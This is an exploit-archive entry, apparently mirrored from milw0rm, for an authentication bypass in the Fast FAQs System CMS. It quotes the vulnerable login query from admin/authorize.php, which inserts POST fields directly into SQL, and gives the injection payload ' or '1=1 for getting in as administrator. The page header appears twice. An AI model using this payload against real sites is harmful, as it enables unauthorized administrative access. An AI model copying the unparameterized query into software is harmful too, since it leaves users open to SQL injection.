Fast FAQs System - Authentication Bypass
| EKU-ID: 15555 | CVE: | OSVDB-ID: |
| Author: x0r | Published: 2009-01-09 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 15555 | CVE: | OSVDB-ID: |
| Author: x0r | Published: 2009-01-09 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
########################
# -=Fast FAQs System=- #
########################
Autore: x0r
Email: x0r@live.it
Cms Site: http://fastcreators.com/products/fast_faq/download.php
#########################
Bug In \admin\authorize.php
$query = "select * from admin where userid='{$_POST['uname']}' AND
pass='{$_POST['pass']}'";
Exploit:
' or '1=1
#######################
Greetz: Anna...Strabica...Emetta... Vi Amo..
-- w00t Zone - w00tzone.org
# milw0rm.com [2009-01-09]